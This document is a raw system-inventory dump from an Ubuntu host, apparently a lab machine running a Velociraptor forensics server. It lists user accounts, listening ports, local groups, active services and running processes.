List User Accounts
_apt
avahi
avahi-autoipd
backup
bin
champuser
colord
cups-pk-helper
daemon
dnsmasq
fwupd-refresh
games
gdm
geoclue
gnats
gnome-initial-setup
hplip
irc
kernoops
list
lp
mail
man
messagebus
news
nm-openvpn
nobody
proxy
pulse
root
rtkit
saned
speech-dispatcher
sssd
sync
sys
syslog
systemd-network
systemd-oom
systemd-resolve
systemd-timesync
tcpdump
tss
usbmux
uucp
uuidd
whoopsie
www-data
-------------------------------- Open network ports (listening sockets)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 10.0.17.48:8001 0.0.0.0:* LISTEN 721/velociraptor
tcp 0 0 10.0.17.48:8003 0.0.0.0:* LISTEN 721/velociraptor
tcp 0 0 10.0.17.48:8889 0.0.0.0:* LISTEN 721/velociraptor
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN 381/systemd-resolve
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN 645/cupsd
tcp6 0 0 ::1:631 :::* LISTEN 645/cupsd
tcp6 0 0 :::8000 :::* LISTEN 721/velociraptor
udp 0 0 127.0.0.53:53 0.0.0.0:* 381/systemd-resolve
udp 0 0 0.0.0.0:5353 0.0.0.0:* 491/avahi-daemon: r
udp 0 0 0.0.0.0:51761 0.0.0.0:* 491/avahi-daemon: r
udp6 0 0 :::44447 :::* 491/avahi-daemon: r
udp6 0 0 :::5353 :::* 491/avahi-daemon: r
raw6 0 0 :::58 :::* 7 496/NetworkManager
--------------------------------- Local Groups Information
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:syslog,champuser
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:champuser
floppy:x:25:
tape:x:26:
sudo:x:27:champuser
audio:x:29:pulse
dip:x:30:champuser
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:champuser
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
systemd-journal:x:101:
systemd-network:x:102:
systemd-resolve:x:103:
crontab:x:104:
messagebus:x:105:
systemd-timesync:x:106:
input:x:107:
sgx:x:108:
kvm:x:109:
render:x:110:
syslog:x:111:
_ssh:x:112:
tss:x:113:
bluetooth:x:114:
ssl-cert:x:115:
uuidd:x:116:
systemd-oom:x:117:
tcpdump:x:118:
avahi-autoipd:x:119:
netdev:x:120:
avahi:x:121:
lpadmin:x:122:champuser
rtkit:x:123:
whoopsie:x:124:
sssd:x:125:
fwupd-refresh:x:126:
nm-openvpn:x:127:
scanner:x:128:saned
saned:x:129:
colord:x:130:
geoclue:x:131:
pulse:x:132:
pulse-access:x:133:
gdm:x:134:
lxd:x:135:champuser
champuser:x:1000:
sambashare:x:136:champuser
--------------------------------- services
UNIT LOAD ACTIVE SUB DESCRIPTION
accounts-daemon.service loaded active running Accounts Service
acpid.service loaded active running ACPI event daemon
apparmor.service loaded active exited Load AppArmor profiles
apport.service loaded active exited LSB: automatic crash report generation
auditd.service loaded active running Security Auditing Service
avahi-daemon.service loaded active running Avahi mDNS/DNS-SD Stack
colord.service loaded active running Manage, Install and Generate Color Profiles
console-setup.service loaded active exited Set console font and keymap
cron.service loaded active running Regular background program processing daemon
cups-browsed.service loaded active running Make remote CUPS printers available locally
cups.service loaded active running CUPS Scheduler
dbus.service loaded active running D-Bus System Message Bus
gdm.service loaded active running GNOME Display Manager
irqbalance.service loaded active running irqbalance daemon
kerneloops.service loaded active running Tool to automatically collect and submit kernel crash signatures
keyboard-setup.service loaded active exited Set the console keyboard layout
kmod-static-nodes.service loaded active exited Create List of Static Device Nodes
ModemManager.service loaded active running Modem Manager
networkd-dispatcher.service loaded active running Dispatcher daemon for systemd-networkd
NetworkManager-wait-online.service loaded active exited Network Manager Wait Online
NetworkManager.service loaded active running Network Manager
openvpn.service loaded active exited OpenVPN service
packagekit.service loaded active running PackageKit Daemon
plymouth-quit-wait.service loaded active exited Hold until boot process finishes up
plymouth-read-write.service loaded active exited Tell Plymouth To Write Out Runtime Data
plymouth-start.service loaded active exited Show Plymouth Boot Screen
podman-restart.service loaded active exited Podman Start All Containers With Restart Policy Set To Always
polkit.service loaded active running Authorization Manager
power-profiles-daemon.service loaded active running Power Profiles daemon
rsyslog.service loaded active running System Logging Service
rtkit-daemon.service loaded active running RealtimeKit Scheduling Policy Service
setvtrgb.service loaded active exited Set console scheme
snapd.apparmor.service loaded active exited Load AppArmor profiles managed internally by snapd
snapd.seeded.service loaded active exited Wait until snapd is fully seeded
snapd.service loaded active running Snap Daemon
switcheroo-control.service loaded active running Switcheroo Control Proxy service
systemd-binfmt.service loaded active exited Set Up Additional Binary Formats
systemd-fsck@dev-disk-by\x2duuid-4015\x2d7165.service loaded active exited File System Check on /dev/disk/by-uuid/4015-7165
systemd-journal-flush.service loaded active exited Flush Journal to Persistent Storage
systemd-journald.service loaded active running Journal Service
systemd-logind.service loaded active running User Login Management
systemd-modules-load.service loaded active exited Load Kernel Modules
systemd-oomd.service loaded active running Userspace Out-Of-Memory (OOM) Killer
systemd-random-seed.service loaded active exited Load/Save Random Seed
systemd-remount-fs.service loaded active exited Remount Root and Kernel File Systems
systemd-resolved.service loaded active running Network Name Resolution
systemd-sysctl.service loaded active exited Apply Kernel Variables
systemd-sysusers.service loaded active exited Create System Users
systemd-timesyncd.service loaded active running Network Time Synchronization
systemd-tmpfiles-setup-dev.service loaded active exited Create Static Device Nodes in /dev
systemd-tmpfiles-setup.service loaded active exited Create Volatile Files and Directories
systemd-udev-trigger.service loaded active exited Coldplug All udev Devices
systemd-udevd.service loaded active running Rule-based Manager for Device Events and Files
systemd-update-utmp.service loaded active exited Record System Boot/Shutdown in UTMP
systemd-user-sessions.service loaded active exited Permit User Sessions
udisks2.service loaded active running Disk Manager
ufw.service loaded active exited Uncomplicated firewall
unattended-upgrades.service loaded active running Unattended Upgrades Shutdown
upower.service loaded active running Daemon for power management
user-runtime-dir@1000.service loaded active exited User Runtime Directory /run/user/1000
user@1000.service loaded active running User Manager for UID 1000
velociraptor.service loaded active running Velociraprot linux amd64
wpa_supplicant.service loaded active running WPA supplicant
LOAD = Reflects whether the unit definition was properly loaded.
ACTIVE = The high-level unit activation state, i.e. generalization of SUB.
SUB = The low-level unit activation state, values depend on unit type.
63 loaded units listed. Pass --all to see loaded but inactive units, too.
To show all installed unit files use 'systemctl list-unit-files'.
--------------------------------- List Processes
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.2 167888 13008 ? Ss 11:08 0:07 /sbin/init splash
root 2 0.0 0.0 0 0 ? S 11:08 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S 11:08 0:00 [pool_workqueue_release]
root 4 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-rcu_g]
root 5 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-rcu_p]
root 6 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-slub_]
root 7 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-netns]
root 10 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/0:0H-events_highpri]
root 12 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-mm_pe]
root 13 0.0 0.0 0 0 ? I 11:08 0:00 [rcu_tasks_kthread]
root 14 0.0 0.0 0 0 ? I 11:08 0:00 [rcu_tasks_rude_kthread]
root 15 0.0 0.0 0 0 ? I 11:08 0:00 [rcu_tasks_trace_kthread]
root 16 0.0 0.0 0 0 ? S 11:08 0:00 [ksoftirqd/0]
root 17 0.0 0.0 0 0 ? I 11:08 0:04 [rcu_preempt]
root 18 0.0 0.0 0 0 ? S 11:08 0:00 [migration/0]
root 19 0.0 0.0 0 0 ? S 11:08 0:00 [idle_inject/0]
root 20 0.0 0.0 0 0 ? S 11:08 0:00 [cpuhp/0]
root 21 0.0 0.0 0 0 ? S 11:08 0:00 [cpuhp/1]
root 22 0.0 0.0 0 0 ? S 11:08 0:00 [idle_inject/1]
root 23 0.0 0.0 0 0 ? S 11:08 0:00 [migration/1]
root 24 0.0 0.0 0 0 ? S 11:08 0:00 [ksoftirqd/1]
root 26 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/1:0H-events_highpri]
root 29 0.0 0.0 0 0 ? S 11:08 0:00 [kdevtmpfs]
root 30 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-inet_]
root 31 0.6 0.0 0 0 ? S 11:08 3:21 [kauditd]
root 32 0.0 0.0 0 0 ? S 11:08 0:00 [khungtaskd]
root 33 0.0 0.0 0 0 ? S 11:08 0:00 [oom_reaper]
root 35 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-write]
root 36 0.0 0.0 0 0 ? S 11:08 0:04 [kcompactd0]
root 38 0.0 0.0 0 0 ? SN 11:08 0:00 [ksmd]
root 39 0.0 0.0 0 0 ? SN 11:08 0:00 [khugepaged]
root 40 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-kinte]
root 41 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-kbloc]
root 42 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-blkcg]
root 43 0.0 0.0 0 0 ? S 11:08 0:00 [irq/9-acpi]
root 44 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-tpm_d]
root 45 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-ata_s]
root 46 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-md]
root 47 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-md_bi]
root 48 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-edac-]
root 49 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-devfr]
root 50 0.0 0.0 0 0 ? S 11:08 0:00 [watchdogd]
root 51 0.0 0.0 0 0 ? I< 11:08 0:11 [kworker/0:1H-kblockd]
root 52 0.0 0.0 0 0 ? S 11:08 0:03 [kswapd0]
root 53 0.0 0.0 0 0 ? S 11:08 0:00 [ecryptfs-kthread]
root 55 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-kthro]
root 56 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-acpi_]
root 57 0.0 0.0 0 0 ? S 11:08 0:00 [scsi_eh_0]
root 58 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-scsi_]
root 59 0.0 0.0 0 0 ? S 11:08 0:00 [scsi_eh_1]
root 60 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-scsi_]
root 61 0.0 0.0 0 0 ? S 11:08 0:00 [scsi_eh_2]
root 62 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-scsi_]
root 66 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-mld]
root 67 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-ipv6_]
root 76 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-kstrp]
root 78 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/u7:0]
root 79 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/u8:0]
root 80 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/u9:0]
root 94 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-charg]
root 113 0.0 0.0 0 0 ? I< 11:08 0:11 [kworker/1:1H-kblockd]
root 146 0.0 0.0 0 0 ? I 11:08 0:12 [kworker/u4:1-ext4-rsv-conversion]
root 181 0.1 0.0 0 0 ? S 11:08 0:38 [jbd2/sda3-8]
root 182 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-ext4-]
root 221 0.1 5.3 469244 323656 ? S<s 11:09 0:50 /lib/systemd/systemd-journald
root 253 0.0 0.1 26888 6992 ? Ss 11:09 0:00 /lib/systemd/systemd-udevd
root 306 0.0 0.0 0 0 ? I< 11:09 0:00 [kworker/R-ttm]
root 308 0.0 0.0 0 0 ? I< 11:09 0:00 [kworker/R-crypt]
systemd+ 378 0.1 0.1 14836 6528 ? Ss 11:09 0:48 /lib/systemd/systemd-oomd
systemd+ 381 0.0 0.2 26464 14192 ? Ss 11:09 0:01 /lib/systemd/systemd-resolved
systemd+ 385 0.0 0.1 89388 7040 ? Ssl 11:09 0:00 /lib/systemd/systemd-timesyncd
root 391 2.3 0.0 11872 2692 ? S<sl 11:09 12:34 /sbin/auditd
root 424 0.0 0.0 0 0 ? S 11:09 0:00 [audit_prune_tree]
root 487 0.0 0.1 239908 7608 ? Ssl 11:09 0:01 /usr/libexec/accounts-daemon
root 488 0.0 0.0 2816 1920 ? Ss 11:09 0:00 /usr/sbin/acpid
avahi 491 0.0 0.0 7632 3712 ? Ss 11:09 0:01 avahi-daemon: running [ubuntu-28.local]
root 493 0.0 0.0 9496 2688 ? Ss 11:09 0:00 /usr/sbin/cron -f -P
message+ 494 0.0 0.1 11120 6656 ? Ss 11:09 0:02 @dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root 496 0.0 0.3 261108 18496 ? Ssl 11:09 0:03 /usr/sbin/NetworkManager --no-daemon
root 502 0.0 0.0 82768 3712 ? Ssl 11:09 0:01 /usr/sbin/irqbalance --foreground
root 506 0.0 0.3 41200 21248 ? Ss 11:09 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root 508 0.0 0.1 243096 11152 ? Ssl 11:09 0:02 /usr/libexec/polkitd --no-debug
root 509 0.0 0.1 240068 7040 ? Ssl 11:09 0:00 /usr/libexec/power-profiles-daemon
syslog 511 0.0 0.0 222404 5248 ? Ssl 11:09 0:00 /usr/sbin/rsyslogd -n -iNONE
root 515 0.0 0.6 1849620 39012 ? Ssl 11:09 0:05 /usr/lib/snapd/snapd
root 517 0.0 0.1 236380 6400 ? Ssl 11:09 0:00 /usr/libexec/switcheroo-control
root 522 0.0 0.1 15400 7672 ? Ss 11:09 0:00 /lib/systemd/systemd-logind
root 525 0.0 0.2 393080 12376 ? Ssl 11:09 0:00 /usr/libexec/udisks2/udisksd
root 528 0.0 0.1 16504 6144 ? Ss 11:09 0:00 /sbin/wpa_supplicant -u -s -O /run/wpa_supplicant
avahi 551 0.0 0.0 7444 1408 ? S 11:09 0:00 avahi-daemon: chroot helper
root 580 0.0 0.1 317972 11832 ? Ssl 11:09 0:00 /usr/sbin/ModemManager
root 593 0.0 1.0 6166548 61752 ? Ssl 11:09 0:13 /usr/local/bin/velociraptor --config /root/server.config.yaml frontend -v
root 614 0.0 0.3 118192 23168 ? Ssl 11:09 0:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
root 641 0.0 0.1 241344 9088 ? Ssl 11:09 0:00 /usr/sbin/gdm3
root 645 0.0 0.1 73028 12032 ? Ss 11:09 0:00 /usr/sbin/cupsd -l
root 691 0.0 0.1 172068 10624 ? Ssl 11:09 0:00 /usr/sbin/cups-browsed
kernoops 707 0.0 0.0 13092 2456 ? Ss 11:09 0:00 /usr/sbin/kerneloops --test
kernoops 712 0.0 0.0 13092 2324 ? Ss 11:09 0:00 /usr/sbin/kerneloops
root 721 0.2 1.4 6168788 90684 ? Sl 11:09 1:24 /usr/local/bin/velociraptor --config /root/server.config.yaml frontend -v
rtkit 745 0.0 0.0 154004 3328 ? SNsl 11:09 0:00 /usr/libexec/rtkit-daemon
root 968 0.0 0.1 242228 8448 ? Ssl 11:09 0:00 /usr/libexec/upowerd
root 974 0.0 0.3 298380 18620 ? Ssl 11:09 0:00 /usr/libexec/packagekitd
colord 1109 0.0 0.2 245376 12536 ? Ssl 11:09 0:00 /usr/libexec/colord
root 1169 0.0 0.1 391920 11316 ? Sl 11:09 0:00 gdm-session-worker [pam/gdm-password]
champus+ 1173 0.0 0.1 17984 10368 ? Ss 11:09 0:02 /lib/systemd/systemd --user
champus+ 1174 0.0 0.0 169964 5340 ? S 11:09 0:00 (sd-pam)
champus+ 1180 0.0 0.0 39568 4864 ? S<sl 11:09 0:00 /usr/bin/pipewire
champus+ 1181 0.0 0.0 23456 4864 ? Ssl 11:09 0:00 /usr/bin/pipewire-media-session
champus+ 1182 0.0 0.3 2132512 19172 ? S<sl 11:09 0:00 /usr/bin/pulseaudio --daemonize=no --log-target=journal
champus+ 1193 0.0 0.1 240892 6812 ? Sl 11:09 0:00 /usr/bin/gnome-keyring-daemon --daemonize --login
champus+ 1201 0.0 0.1 162432 6144 tty2 Ssl+ 11:09 0:00 /usr/libexec/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu /usr/bin/gnome-session --session=ubuntu
champus+ 1203 0.2 1.6 655052 99396 tty2 Sl+ 11:09 1:19 /usr/lib/xorg/Xorg vt2 -displayfd 3 -auth /run/user/1000/gdm/Xauthority -nolisten tcp -background none -noreset -keeptty -novtswitch -verbose 3
champus+ 1214 0.0 0.1 10320 6528 ? Ss 11:09 0:02 /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
champus+ 1215 0.0 0.1 612836 7552 ? Ssl 11:09 0:00 /usr/libexec/xdg-document-portal
champus+ 1218 0.0 0.1 236156 6272 ? Ssl 11:09 0:00 /usr/libexec/xdg-permission-store
root 1224 0.0 0.0 2796 1792 ? Ss 11:09 0:00 fusermount3 -o rw,nosuid,nodev,fsname=portal,auto_unmount,subtype=portal -- /run/user/1000/doc
champus+ 1252 0.0 0.2 223044 13440 tty2 Sl+ 11:09 0:00 /usr/libexec/gnome-session-binary --session=ubuntu
champus+ 1341 0.0 0.1 309728 7936 ? Ssl 11:09 0:00 /usr/libexec/at-spi-bus-launcher
champus+ 1347 0.0 0.0 8564 4480 ? S 11:09 0:00 /usr/bin/dbus-daemon --config-file=/usr/share/defaults/at-spi2/accessibility.conf --nofork --print-address 11 --address=unix:path=/run/user/1000/at-spi/bus_1
champus+ 1390 0.0 0.0 91912 5120 ? Ssl 11:09 0:00 /usr/libexec/gnome-session-ctl --monitor
champus+ 1406 0.0 0.1 240648 7808 ? Ssl 11:09 0:00 /usr/libexec/gvfsd
champus+ 1418 0.0 0.1 380896 6656 ? Sl 11:09 0:00 /usr/libexec/gvfsd-fuse /run/user/1000/gvfs -f
champus+ 1423 0.0 0.2 519128 15232 ? Ssl 11:09 0:00 /usr/libexec/gnome-session-binary --systemd-service --session=ubuntu
champus+ 1468 1.4 5.0 4242500 305728 ? Ssl 11:09 7:26 /usr/bin/gnome-shell
champus+ 1516 0.0 0.3 583040 19584 ? Sl 11:09 0:00 /usr/libexec/gnome-shell-calendar-server
champus+ 1522 0.0 0.3 1072140 23296 ? Ssl 11:09 0:00 /usr/libexec/evolution-source-registry
champus+ 1530 0.0 0.5 597216 35584 ? Sl 11:09 0:00 /usr/libexec/goa-daemon
champus+ 1533 0.0 0.4 840468 27264 ? Ssl 11:09 0:00 /usr/libexec/evolution-calendar-factory
champus+ 1542 0.0 0.2 338404 13696 ? Sl 11:09 0:00 /usr/libexec/goa-identity-service
champus+ 1543 0.0 0.1 315892 10112 ? Ssl 11:09 0:00 /usr/libexec/gvfs-udisks2-volume-monitor
champus+ 1553 0.0 0.1 315212 7680 ? Ssl 11:09 0:02 /usr/libexec/gvfs-afc-volume-monitor
champus+ 1561 0.0 0.1 236460 6528 ? Ssl 11:09 0:00 /usr/libexec/gvfs-mtp-volume-monitor
champus+ 1563 0.0 0.0 156940 5888 ? Ssl 11:09 0:00 /usr/libexec/dconf-service
champus+ 1572 0.0 0.4 672364 26880 ? Ssl 11:09 0:00 /usr/libexec/evolution-addressbook-factory
champus+ 1573 0.0 0.1 236636 6656 ? Ssl 11:09 0:00 /usr/libexec/gvfs-goa-volume-monitor
champus+ 1577 0.0 0.1 237416 6912 ? Ssl 11:09 0:00 /usr/libexec/gvfs-gphoto2-volume-monitor
champus+ 1594 0.0 0.1 314868 8832 ? Sl 11:09 0:00 /usr/libexec/gvfsd-trash --spawner :1.19 /org/gtk/gvfs/exec_spaw/0
champus+ 1603 0.0 0.4 2599500 26372 ? Sl 11:09 0:00 /usr/bin/gjs /usr/share/gnome-shell/org.gnome.Shell.Notifications
champus+ 1606 0.0 0.1 162756 7808 ? Sl 11:09 0:00 /usr/libexec/at-spi2-registryd --use-gnome-session
champus+ 1618 0.0 0.0 2892 1664 ? Ss 11:09 0:00 sh -c /usr/bin/ibus-daemon --panel disable $([ "$XDG_SESSION_TYPE" = "x11" ] && echo "--xim")
champus+ 1619 0.0 0.1 310392 6656 ? Ssl 11:09 0:00 /usr/libexec/gsd-a11y-settings
champus+ 1622 0.0 0.1 315500 11812 ? Sl 11:09 0:18 /usr/bin/ibus-daemon --panel disable --xim
champus+ 1624 0.0 0.4 537204 25316 ? Ssl 11:09 0:00 /usr/libexec/gsd-color
champus+ 1630 0.0 0.2 375436 13568 ? Ssl 11:09 0:00 /usr/libexec/gsd-datetime
champus+ 1633 0.0 0.1 312080 7936 ? Ssl 11:09 0:01 /usr/libexec/gsd-housekeeping
champus+ 1634 0.0 0.3 341424 22508 ? Ssl 11:09 0:00 /usr/libexec/gsd-keyboard
champus+ 1638 0.0 0.4 717624 25796 ? Ssl 11:09 0:00 /usr/libexec/gsd-media-keys
champus+ 1640 0.0 0.4 525040 24312 ? Ssl 11:09 0:00 /usr/libexec/gsd-power
champus+ 1642 0.0 0.1 249872 10752 ? Ssl 11:09 0:00 /usr/libexec/gsd-print-notifications
champus+ 1643 0.0 0.1 232272 7552 ? Sl 11:09 0:00 /usr/libexec/gsd-disk-utility-notify
champus+ 1644 0.0 0.1 457856 6656 ? Ssl 11:09 0:00 /usr/libexec/gsd-rfkill
champus+ 1646 0.0 0.1 236292 6272 ? Ssl 11:09 0:00 /usr/libexec/gsd-screensaver-proxy
champus+ 1649 0.0 0.1 465780 9344 ? Ssl 11:09 0:00 /usr/libexec/gsd-sharing
champus+ 1654 0.0 0.1 312272 7552 ? Ssl 11:09 0:00 /usr/libexec/gsd-smartcard
champus+ 1657 0.0 0.9 762828 60304 ? Sl 11:09 0:00 /usr/libexec/evolution-data-server/evolution-alarm-notify
champus+ 1661 0.0 0.1 319312 8704 ? Ssl 11:09 0:00 /usr/libexec/gsd-sound
champus+ 1665 0.0 0.3 268020 22548 ? Ssl 11:09 0:00 /usr/libexec/gsd-wacom
champus+ 1674 0.0 0.3 343292 23932 ? Ssl 11:09 0:00 /usr/libexec/gsd-xsettings
champus+ 1693 0.0 0.1 237312 7296 ? Sl 11:09 0:00 /usr/libexec/ibus-dconf
champus+ 1695 0.0 0.4 272488 28020 ? Sl 11:09 0:03 /usr/libexec/ibus-extension-gtk3
champus+ 1701 0.0 0.3 194160 22968 ? Sl 11:09 0:00 /usr/libexec/ibus-x11 --kill-daemon
champus+ 1706 0.0 0.1 237264 7424 ? Sl 11:09 0:00 /usr/libexec/ibus-portal
champus+ 1723 0.0 0.2 342364 14208 ? Sl 11:09 0:00 /usr/libexec/gsd-printer
champus+ 1733 0.0 0.0 39136 4224 ? Ss 11:09 0:00 /snap/snapd-desktop-integration/315/usr/bin/snapd-desktop-integration
champus+ 1745 0.0 0.1 623772 11904 ? Ssl 11:09 0:01 /usr/libexec/xdg-desktop-portal
champus+ 1765 0.0 1.2 1395884 73560 ? Ssl 11:09 0:02 /usr/libexec/xdg-desktop-portal-gnome
champus+ 1851 0.0 0.4 2534008 26908 ? Sl 11:09 0:00 /usr/bin/gjs /usr/share/gnome-shell/org.gnome.ScreenSaver
champus+ 1855 0.0 1.1 915040 71320 ? Sl 11:09 0:00 /snap/snapd-desktop-integration/315/usr/bin/snapd-desktop-integration
champus+ 1874 0.0 0.1 163612 7424 ? Sl 11:09 0:06 /usr/libexec/ibus-engine-simple
champus+ 1875 0.0 0.5 719576 35448 ? SNsl 11:09 0:01 /usr/libexec/tracker-miner-fs-3
champus+ 1926 0.0 0.3 342028 22784 ? Ssl 11:09 0:00 /usr/libexec/xdg-desktop-portal-gtk
champus+ 1962 0.0 0.1 163048 6400 ? Ssl 11:09 0:00 /usr/libexec/gvfsd-metadata
champus+ 1997 0.0 0.5 537936 36096 ? Sl 11:10 0:02 update-notifier
champus+ 3887 0.0 0.0 41316 2944 ? S 11:16 0:00 podman
champus+ 9538 0.0 1.0 1203740 64236 ? Sl 11:40 0:05 /usr/bin/nautilus --gapplication-service
champus+ 9568 3.6 14.3 12403380 870936 ? Sl 11:42 17:46 /snap/firefox/7177/usr/lib/firefox/firefox
champus+ 9638 0.0 0.0 21072 2464 ? Sl 11:42 0:00 /snap/firefox/7177/usr/lib/firefox/crashhelper 9568 9 /tmp/ 11
champus+ 9701 0.0 0.4 299784 27520 ? S 11:42 0:00 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -ipcHandle 0 -signalPipe 1 -initialChannelId {54ef713b-a611-4e84-9f06-df63f5debaf4} -parentPid 9568 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 1 forkserver
champus+ 9704 0.0 0.5 314180 36268 ? Sl 11:42 0:00 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -parentBuildID 20251028100515 -prefsHandle 0:35969 -prefMapHandle 1:275119 -sandboxReporter 2 -chrootClient 3 -ipcHandle 4 -initialChannelId {232c0fd9-eff3-428d-9663-2763ef6a6ffb} -parentPid 9568 -crashReporter 5 -crashHelper 6 -appDir /snap/firefox/7177/usr/lib/firefox/browser 2 socket
champus+ 9732 1.7 3.1 2538744 188336 ? Sl 11:42 8:26 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:36141 -prefMapHandle 1:275119 -jsInitHandle 2:224660 -parentBuildID 20251028100515 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {2f719dbf-acd1-40e7-9c1f-45b26d269367} -parentPid 9568 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 3 tab
champus+ 9743 0.0 0.6 447228 41132 ? Sl 11:42 0:00 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -parentBuildID 20251028100515 -prefsHandle 0:36141 -prefMapHandle 1:275119 -sandboxReporter 2 -chrootClient 3 -ipcHandle 4 -initialChannelId {83a6878e-195a-47e0-aa3f-fe4a5dfe3b7b} -parentPid 9568 -crashReporter 5 -crashHelper 6 -appDir /snap/firefox/7177/usr/lib/firefox/browser 4 rdd
champus+ 9780 0.0 0.2 1765940 17792 ? Sl 11:42 0:01 /usr/bin/snap userd
champus+ 9938 0.0 1.4 2465008 87996 ? Sl 11:42 0:01 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:45757 -prefMapHandle 1:275119 -jsInitHandle 2:224660 -parentBuildID 20251028100515 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {0e618765-94ab-4adb-96ee-e57c09db7d36} -parentPid 9568 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 5 tab
champus+ 10235 0.0 0.7 451848 47280 ? Sl 11:42 0:00 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -parentBuildID 20251028100515 -sandboxingKind 0 -prefsHandle 0:46927 -prefMapHandle 1:275119 -sandboxReporter 2 -chrootClient 3 -ipcHandle 4 -initialChannelId {4c7ee706-7853-4c03-b832-7098687275bf} -parentPid 9568 -crashReporter 5 -crashHelper 6 -appDir /snap/firefox/7177/usr/lib/firefox/browser 6 utility
champus+ 10244 1.2 11.7 3234416 715124 ? Sl 11:42 6:03 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:43481 -prefMapHandle 1:275119 -jsInitHandle 2:224660 -parentBuildID 20251028100515 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {22da36fa-b041-4214-bca0-96970a908d65} -parentPid 9568 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 7 tab
champus+ 10451 0.2 1.3 2454436 83724 ? Sl 11:42 1:07 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:43670 -prefMapHandle 1:275119 -jsInitHandle 2:224660 -parentBuildID 20251028100515 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {0846778f-6aeb-4339-8fc9-4ab5f998a29e} -parentPid 9568 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 10 tab
champus+ 10653 0.0 0.1 388688 8704 ? Sl 11:43 0:00 /usr/libexec/gvfsd-network --spawner :1.19 /org/gtk/gvfs/exec_spaw/1
champus+ 10667 0.0 0.1 316828 8576 ? Sl 11:43 0:00 /usr/libexec/gvfsd-dnssd --spawner :1.19 /org/gtk/gvfs/exec_spaw/3
